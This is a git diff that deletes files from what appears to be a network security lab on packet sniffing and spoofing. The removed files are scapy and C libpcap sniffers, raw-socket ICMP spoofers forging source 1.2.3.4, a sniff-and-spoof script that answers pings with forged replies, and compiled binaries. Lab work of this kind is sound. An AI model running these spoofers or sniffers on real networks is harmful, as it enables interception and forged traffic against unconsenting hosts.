-#!/usr/bin/env python3
-from scapy.all import *
-
-def spoof_reply(pkt):
-    # Only respond to ICMP Echo Requests
-    if ICMP in pkt and pkt[ICMP].type == 8:
-        print(f"Intercepted ICMP Echo Request from {pkt[IP].src} to {pkt[IP].dst}")
-        
-        # Build spoofed ICMP Echo Reply
-        ip = IP(src=pkt[IP].dst, dst=pkt[IP].src)
-        icmp = ICMP(type=0, id=pkt[ICMP].id, seq=pkt[ICMP].seq)
-        
-        # Add payload if present
-        payload = pkt[Raw].load if Raw in pkt else b""
-        
-        new_pkt = ip/icmp/payload
-        print(f"Sending spoofed reply from {pkt[IP].dst} to {pkt[IP].src}...")
-        send(new_pkt, verbose=0)
-
-print("Sniff-and-Spoof active on br-c031fbf1a197...")
-# Filter: icmp echo-request
-sniff(iface='br-c031fbf1a197', filter='icmp and icmp[icmptype]=8', prn=spoof_reply)
diff --git a/Sniffing_Spoofing/volumes/sniff_and_spoof_c b/Sniffing_Spoofing/volumes/sniff_and_spoof_c
deleted file mode 100755
index fdc778c9fdbac132910349e4065146650843eacc..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 16712
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
B!dn0U

diff --git a/Sniffing_Spoofing/volumes/sniffer.c b/Sniffing_Spoofing/volumes/sniffer.c
deleted file mode 100644
index badcbe0..0000000
--- a/Sniffing_Spoofing/volumes/sniffer.c
+++ /dev/null
@@ -1,39 +0,0 @@
-#include <pcap.h>
-#include <stdio.h>
-#include <stdlib.h>
-
-void got_packet(u_char *args, const struct pcap_pkthdr *header, const u_char *packet) {
-    printf("Got a packet\n");
-}
-
-int main() {
-    pcap_t *handle;
-    char errbuf[PCAP_ERRBUF_SIZE];
-    struct bpf_program fp;
-    char filter_exp[] = "icmp";
-    bpf_u_int32 net;
-
-    // Step 1: Open pcap session on the interface
-    handle = pcap_open_live("br-c031fbf1a197", BUFSIZ, 1, 1000, errbuf);
-    if (handle == NULL) {
-        fprintf(stderr, "Couldn't open device: %s\n", errbuf);
-        return 2;
-    }
-
-    // Step 2: Compile filter_exp into BPF code
-    if (pcap_compile(handle, &fp, filter_exp, 0, net) == -1) {
-        fprintf(stderr, "Couldn't parse filter %s: %s\n", filter_exp, pcap_geterr(handle));
-        return 2;
-    }
-    if (pcap_setfilter(handle, &fp) == -1) {
-        fprintf(stderr, "Couldn't install filter %s: %s\n", filter_exp, pcap_geterr(handle));
-        return 2;
-    }
-
-    // Step 3: Capture packets
-    printf("Sniffing ICMP packets using C and libpcap...\n");
-    pcap_loop(handle, -1, got_packet, NULL);
-
-    pcap_close(handle);
-    return 0;
-}
diff --git a/Sniffing_Spoofing/volumes/sniffer.py b/Sniffing_Spoofing/volumes/sniffer.py
deleted file mode 100755
index ff1912e..0000000
--- a/Sniffing_Spoofing/volumes/sniffer.py
+++ /dev/null
@@ -1,8 +0,0 @@
-#!/usr/bin/env python3
-from scapy.all import *
-
-def print_pkt(pkt):
-    pkt.show()
-
-print("Sniffing ICMP packets from spoofed IP 1.2.3.4...")
-pkt = sniff(iface='br-c031fbf1a197', filter='icmp and src host 1.2.3.4', prn=print_pkt, count=1)
diff --git a/Sniffing_Spoofing/volumes/sniffer_c b/Sniffing_Spoofing/volumes/sniffer_c
deleted file mode 100755
index 99991746e58d0f4aa371c41ec37521bac2543f3d..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 16352
zcmeHOeT-aH6~D7>=~`%a3oVwGj|XX?Rd%|&ZI>1-%yzrmx1^<OKd`9qIy*DFJ1{#l
z&b+C+AaPACaa<c~6Hpow8~@P81Vlgsjgl!vXo(?9OcY~?jj?f8P|Al`KJ55A_nz~1
z=Iu^n_`^i=ZZhxO^E+Sno_Fueee>@9YUk#zx==_-nW1i0#FZKi5@EsawOj#-sI_Vy
zu2-rn)CJ&YYRt$ZhCpgc<BV!r&p5$k=d#>SFK0cW(n6wSSF7ye074b_gY0IJ5%Yd}
zjN2hp<X$|Bj8QCo_2?;5KoMGLN4Y6AX|XD;ucqItGyLOB#g16A8)LgMwi9}W;|Y~~
zQcmd8!~O8nrI1k(O1e~t(r4sq;-=DwM(LiL;*VEiJ3qBpU#P^}e%g(HoOnHK_c%NB
z)9X2&P>J_h*ik<J(;~xT8^^14{~~<fgz|0Cxm<u?bQ?C^wo^6#vwrhW-ah!w@UHv?
zFa70}vEPMO9$J}7_O`8FnTj{1lIg-w)6m+srnc4Ld?wtg$ZZ2Y<WINTIM&e!U-$N?
zObKvPOAnxnr^1-2-jJ=59;~6irv`p^4V;>3;o~p+08G~&x=)s08T?6nu9*h^0<h`)
ze76SPRRcd(13yv&KMH)lx=ihkpn@XfUpd`7wm9)bF43RNyNTS6Egh*$I<X_#n@T9h
z=^xCboxB^(xsGF0r&Y|xqFE=E$z+wT#ZsAk!c_AKw=bE3W5f0*Q000in@BsU<Q~?H
zWd^fJ1kD!QJR&1#>>ejJaF5d$O{M@~u*JA3gVAJK<z2Kor~0zFWZLb6LTo7N^d-~L
zRPx@0f;KgU24f2`F{-txO`E$nbU3ZyRja+~WUV#4#w16NUasmo&4N12i8_qu8R|4R
znO{$R=OGO5nd(i(79^8%Y1Vwed|`3&6WW#r7K(g-O8&>@8~g-+KMFp=cu&O01sA?_
zi@|Ab=}Bc+b)o{-^N#Vc3S4}V=+z1w4fV>Y3Vfc2DsTMIZxGF6uS863HVAiB1N9X+
zf2C`@u>zOxI1((X!1eDOfhbl)6Gi^%BV~ES)Cij+AZT;MFoa)ds`|P%Vi>|NGF5$z
zL<~bXZeUP?3<MbnG7w}S$Uu;R|A7p=({SYn_TD$@?a^63U8$74ujJO1$Lzh&*B{rd
zFRytCaCzCUac#INf*SDyB%3%@Mp^b8@w9ZA7}NYw;%R9$QPTVq#M2UH;&ILYn0Q*c
zOdQty4~VBF%ftcAA0nQXU=t&nKS(?+FD9~@|0eOY6r0!$p4#8?x9;LAciF{1*?a$d
zre{ZIOR43gy??!hMwJ(S7*^`tzHq};Uxx`gxPN^V4($E2K2K!bS@#Nb{aGkc*XNf{
zQ78K*^^f~_*k7&f*DNNo;+$PPV;?&^!#?)+TkOya_ABSy%i*xV4jakg`TSA)N7lav
zbyZkp?_J+PwVihHv^&=xUH=%k^1^0Z$2-v37iK+$YUs}6wcAJjCO!vU@_`#`*~R<M
z+Qq^dySQ^4y<RX6tuDSezVTeSeBk79t@X7xB1l!-9-X;tIi;xBdA6nW;=b3Rl8g;z
zU)c91YDn3GXF%cOH7xYHi(}7><E|d1JO8Y*jMsDjf<kfM3DVp9OCqYU66tsk|7Ljh
zb03AhU3?kMcpAoPd^z-<)+1&Pyp8UEUWa**;@kUwHb!Jr`)n_sc!n&f15YB<-m~Sx
z%`7AA+dBL)1l(r=8W(GB*8w@&Q7D;ckC3bV4^{-Qi@zm5{p|au3g4?d-z%zoFRAo>
zm-v3Y19`HHX#CZWs3QySp6rP3#j`Y=DcmA*ZF)%T!%)|Wu}62FjoY7Ipzn%1Yy1=h
zCowI(IqS_*N=i_I3<MbnG7w}S$Uu;RAOk@Lf(!&12r_W~421YC$fk^IMXfB}9VJ}V
zn`??SuWIS*?Q4m)th+&VWD2Qx`a0L5S5H<vu_qZz+-NP!&zY2Dqq%&-GOw&4F;ax~
zOp|H6nM$SnD%;b^KD>PDx4JvF^l<#VRmc<6VMWt%OWsI@@#u?(-z76{qIZY%2SWDE
za(Ops;~6|Zfv$L~T>b{=R?s7$ROnqSmC(K0RA{I%wB(}M^#|~jNjSYoEy2gNq_A<e
zel@ie)z$da13wI^<~4TBTXbu~g<q~8QMW9<=~JtgUPCb1ei5IC5nJ20&ue_3u4C>6
zQ3PQ5S3tiH`IGdFEb<wTg^UI;6zWGaKJ*6&y)UjCQ6<6}@Sze?A<dHuDtMDt#gi^I
zoaAIrh5kGdeGLScAOk@Lf(!&12r>|4Ajm+Ffgl4x2L3NHAp78C-<z!aU*+Bjf0}u3
z?-p;w!z(IXp1Q=)%b1t_c1xJ2XBsMt4N<c1j-G?4i2NVt${FGh&>LSA*^9Q8EA(ta
z<!P47-m^w-sO&jgWYp9`rb5_Ejq^S`dTmHW`YX?S^un0RCk;^}3<!RN8zSu%d)dn;
z@jon^{=kh^#XCIRKmCRpAYS2VUh<5`J<Z$f|9$4A-Q1l2I+6Y3{=jWK4!W4$&a{u|
z9;Od4eTeA~nf{!q_?3N@n>spfw3g$EbcNNjCfpisv09s3+nQUO*NNuzl=3)Jy;b&0
z>Ar-p16cN%TdY9Cb~^p5fY)KC;u&B2u4cTM_ldF_{mf7LGLHnm6_pV7{|-b9BKP@r
zjW6)#fsrb8KPu!$=B408t$&HPk5%v^s7%-XCu-oo(0&@#5Ou^?rt|ZX)@e|(UtUaJ
zLnVaSA@fM^cQn3G`Nzv6=(wd8DLW#Xh8_lfG5TBLJYUP=k3cW3R@K~W?PsdsQtf9d
zejVX;bCrBQiAGZm{m<0EZQzy|SI~G3{VxHZk5evUME|o;83AtTTJ_}+@WyHK^CRH;
z52I>z^&If|b&J%lNVVW)#$_If^bf$N%jaK#H&*OV7yb8Y=+DO&Ch2E=aW4fv-9Gmf
z!0G<}p683)-_;tIXp{72?SE>&I&0|PQ3Kzj@rzWM<Ldv=5avF@>*kn0y(YsdwLO+|
zTf!OaXOH$K9XHyq0Q6#aetJ95$&LDsJLq7aeL6v#<>MKrKb7f?rkuE&$>p7BVMx(_
z`V_X?$HUFjYtUx-q!Z2MqQg!i?dFD6UoJYBaN>o*!C{zGa1J!xD%Cvw-<imTW7NDv
zI!=vqoUU!{TRNT2+cwf^0SDijPN&VFy>XjzHf`Rzp?$NnwX17;=MHB_`-aV(P~3RO
zZS7mSJ1Wl(_)Z?snShAw-KTB(y6wimcZ`5f7@Y4|gE^zX#|@nBtvFQ>Po|whJ`q39
z83$xJ>PF281az+Qv_W;#9Gs!>auCmFoB{m(O9vb1ki_J92*>Ho=RJ4T#~nO}s}*id
zoX<LVC}p5O<2w8|w|1;gUpNVBqnwGT(w}mG!js}Ggg#KAZ?aP1{P3U~?FDsnh7L$A
zopBT4{&XSSTS(&6Pcp8;ID3)EWtBz;qWJ+8jt{5d!B976BzqFMd@_@+VjReFiByyf
zxRy=1<S~h>n;62CMkr(%-K%h7fXC!O9Ja!#u-B|?4uc`*4l~rgp}UDDkalTCuW>1L
zM2-$7V`x?e!Eg!d7MN(bJ1UGxG>ExTIYB>Ooz|bUX2Z1CrPjGN7UQ?Hy3k7ld=+~3
zwayue73o%%HZbpD4JYwsT`P1cD@$BiPl}HSDzv5*ds+7irQZ`Ov^=J&*vtCU21aW~
zv6pqUP+2!aMHhejdw|j!RqSP5D%3J&Ufx7c=$(+$npb#P_X>@$y}$hos}w4f8?isa
z>tdm@?)K+T`cLQ3NVWkVDzc6jT4_&feSiK&fKg63?BwqTuUF*x1}eHpJA}Uvl}dYy
z?Svi{MW!sqZ>%W~fK=L-SRnLmNsP~)S@kWSy{v<T%JZA(``dqz?Y%G-YchS5Ss{`?
z;SZrg?H7AlM+&`O6q)+tAMx3rvW%k8N7zn?KmHRCRL+0@In{_5GWFa4%4aXn4?-=U
zy}$jxfgGzqJqJluo{QyNs6U?YLjMSxh6;OmZa&dO-X_PZ;U;;pe;ooEyYl=f>vB0C
zEa!mv@!A{zGXCC$E!{t{m-BC>l>kwe8{%ChuF&@(skE2pg>kmu?OB?N*a@wJaizUH
zKiJJiU)m{d#LnYkOqjHPcf?3`)v&jW*t^c<_^j^XV(*{-)K)5$RK~uMnClQb?BM}J
v|AWx_T-q<+U-aB6Z8w(YdV*duqkPThT;dujt;wgi@4mrk&~sB|@v-XPgbA?c

diff --git a/Sniffing_Spoofing/volumes/spoofer.c b/Sniffing_Spoofing/volumes/spoofer.c
deleted file mode 100644
index d6c2c66..0000000
--- a/Sniffing_Spoofing/volumes/spoofer.c
+++ /dev/null
@@ -1,81 +0,0 @@
-#include <stdio.h>
-#include <string.h>
-#include <sys/socket.h>
-#include <netinet/ip.h>
-#include <netinet/ip_icmp.h>
-#include <arpa/inet.h>
-#include <unistd.h>
-
-/* Checksum calculation function */
-unsigned short in_cksum (unsigned short *buf, int length) {
-    unsigned short *w = buf;
-    int nleft = length;
-    int sum = 0;
-    unsigned short temp=0;
-
-    while (nleft > 1)  {
-        sum += *w++;
-        nleft -= 2;
-    }
-
-    if (nleft == 1) {
-        *(u_char *)(&temp) = *(u_char *)w ;
-        sum += temp;
-    }
-
-    sum = (sum >> 16) + (sum & 0xffff);
-    sum += (sum >> 16);
-    return (unsigned short)(~sum);
-}
-
-void send_raw_ip_packet(struct iphdr* ip) {
-    struct sockaddr_in dest_info;
-    int enable = 1;
-
-    int sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
-    if (sock < 0) {
-        perror("Socket creation failed");
-        return;
-    }
-
-    setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &enable, sizeof(enable));
-
-    dest_info.sin_family = AF_INET;
-    dest_info.sin_addr.s_addr = ip->daddr;
-
-    if (sendto(sock, ip, ntohs(ip->tot_len), 0, (struct sockaddr *)&dest_info, sizeof(dest_info)) < 0) {
-        perror("Sendto failed");
-    } else {
-        printf("Spoofed ICMP packet sent.\n");
-    }
-    close(sock);
-}
-
-int main() {
-    char buffer[1500];
-    memset(buffer, 0, 1500);
-
-    struct iphdr *ip = (struct iphdr *) buffer;
-    struct icmphdr *icmp = (struct icmphdr *) (buffer + sizeof(struct iphdr));
-
-    // Construct ICMP Header
-    icmp->type = ICMP_ECHO;
-    icmp->code = 0;
-    icmp->un.echo.id = htons(1234);
-    icmp->un.echo.sequence = htons(1);
-    icmp->checksum = 0;
-    icmp->checksum = in_cksum((unsigned short *)icmp, sizeof(struct icmphdr));
-
-    // Construct IP Header
-    ip->version = 4;
-    ip->ihl = 5;
-    ip->ttl = 64;
-    ip->saddr = inet_addr("1.2.3.4");
-    ip->daddr = inet_addr("10.9.0.5");
-    ip->protocol = IPPROTO_ICMP;
-    ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr));
-
-    send_raw_ip_packet(ip);
-
-    return 0;
-}
diff --git a/Sniffing_Spoofing/volumes/spoofer.py b/Sniffing_Spoofing/volumes/spoofer.py
deleted file mode 100644
index 92583bb..0000000
--- a/Sniffing_Spoofing/volumes/spoofer.py
+++ /dev/null
@@ -1,10 +0,0 @@
-#!/usr/bin/env python3
-from scapy.all import *
-
-print("Spoofing ICMP echo request from 1.2.3.4 to 10.9.0.5...")
-a = IP()
-a.src = '1.2.3.4'
-a.dst = '10.9.0.5'
-b = ICMP()
-p = a/b
-send(p)
diff --git a/Sniffing_Spoofing/volumes/spoofer_c b/Sniffing_Spoofing/volumes/spoofer_c
deleted file mode 100755
index fc02ad065b462b83c5b59d7bdee377d809853fd5..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 16496
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
